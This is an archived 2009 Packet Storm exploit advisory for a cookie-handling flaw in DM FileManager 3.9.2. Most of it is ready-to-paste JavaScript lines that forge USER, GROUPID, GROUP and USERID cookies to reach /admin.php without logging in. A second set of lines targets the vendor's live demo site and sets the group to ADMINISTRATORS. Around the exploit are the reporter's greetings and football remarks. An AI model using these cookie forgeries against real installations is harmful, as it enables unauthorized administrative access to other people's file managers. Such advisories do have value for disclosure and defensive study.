DM FileManager 3.9.2 Insecure Cookie

2009-06-08T00:00:00
ID PACKETSTORM:78156
Type packetstorm
Reporter ThE g0bL!N
Modified 2009-06-08T00:00:00

Description

                                        
                                            `DM FileManager 3.9.2 Insecure Cookie Handling Vuln  
Founder: ThE g0bL!N  
------  
Home: http:/www.4ckx.com/dz/  
----  
Vendor:http://dutchmonkey.com  
Special Thx: Snakespc  
Note: Algerie 3-1 Egypt  
Exploit:  
------  
javascript:document.cookie="USER=[user name ];path=/";  
javascript:document.cookie="GROUPID=1;path=/";  
javascript:document.cookie="GROUP=[Groupe of user];path=/";  
javascript:document.cookie="USERID=[user_id];path=path=/";  
Then Go to Url /admin.php  
Demo:  
----  
http://dutchmonkey.com/products/dm-filemanager/demo/admin/login.php  
Exp for demo:  
------------  
javascript:document.cookie="USER=GUEST;path=/products/dm-filemanager/demo/admin/";  
javascript:document.cookie="GROUPID=1;path=/products/dm-filemanager/demo/admin/";  
javascript:document.cookie="GROUP=ADMINISTRATORS;path=/products/dm-filemanager/demo/admin/";  
javascript:document.cookie="USERID=51;path=/products/dm-filemanager/demo/admin/";  
Note: ALgerie en Coupe Du Monde In shaa ALLAH  
################################################################################################  
  
  
`